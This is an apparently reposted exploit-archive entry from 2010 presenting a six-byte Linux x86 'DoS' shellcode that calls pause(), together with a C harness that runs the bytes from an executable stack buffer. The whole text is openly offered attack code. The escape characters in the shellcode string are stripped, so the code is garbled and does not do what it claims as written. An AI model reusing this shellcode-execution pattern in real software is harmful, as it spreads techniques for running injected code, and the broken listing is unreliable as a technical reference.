linux/x86 - DoS-Badger-Game shellcode 6 bytes
Posted on 14 April 2010
============================================= linux/x86 - DoS-Badger-Game shellcode 6 bytes ============================================= #include <stdio.h> #include <string.h> /* by Magnefikko 14.04.2010 magnefikko@gmail.com promhyl.oz.pl Subgroup: #PRekambr Name: 6 bytes DoS-Badger-Game shellcode Platform: Linux x86 pause() gcc -Wl,-z,execstack filename.c shellcode: x31xc0xb0x1dxcdx80 */ int main(){ char shell[] = "x31xc0xb0x1dxcdx80"; printf("by Magnefikko magnefikko@gmail.com promhyl.oz.pl strlen(shell) = %d ", strlen(shell)); (*(void (*)()) shell)(); } # Inj3ct0r.com [2010-04-14]